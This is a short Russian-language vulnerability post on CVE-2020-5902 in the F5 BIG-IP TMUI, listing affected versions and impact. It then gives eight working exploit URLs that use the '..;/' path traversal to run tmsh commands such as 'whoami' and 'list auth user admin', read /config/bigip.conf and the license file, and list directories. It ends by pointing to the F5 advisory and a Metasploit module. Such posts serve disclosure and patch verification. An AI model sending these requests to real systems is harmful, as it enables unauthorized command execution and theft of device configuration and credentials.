
[CVE-2020-5902] F5 BIG-IP Удаленное выполнение кода (RCE)
[CVE-2020-5902] Удаленное выполнение кода в пользовательском интерфейсе управления трафиком (TMUI) F5 BIG-IP
В версиях BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 и 11.6.1-11.6.5.1 в пользовательском интерфейсе управления трафиком (TMUI), также называемом утилитой конфигурации (Configuration utility), существует уязвимость удаленного выполнения кода (RCE) на нераскрытых страницах.
Эта уязвимость позволяет неавторизованным злоумышленникам или авторизованным пользователям, имеющим сетевой доступ к утилите конфигурации через управляющий порт BIG-IP и/или self IP-адреса, выполнять произвольные системные команды, создавать или удалять файлы, отключать службы и/или выполнять произвольный Java-код. Данная уязвимость может привести к полной компрометации системы. Система BIG-IP в режиме Appliance также уязвима. Эта проблема не затрагивает плоскость данных (data plane); затронута только плоскость управления (control plane).
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/tmshCmd.jsp?command=whoami
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/tmshCmd.jsp?command=list+auth+user+admin
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/fileRead.jsp?fileName=/etc/f5-release
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/fileRead.jsp?fileName=/config/bigip.license
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/directoryList.jsp?directoryPath=/usr/local/www/
Официальное уведомление об уязвимости опубликовано F5, и вы можете ознакомиться с ним здесь
Кроме того, для CVE-2020-5902 доступен модуль Metasploit с рейтингом Excellent. Вы можете найти Ruby-код модуля Metasploit для exploits/linux/http/f5_bigip_tmui_rce.rb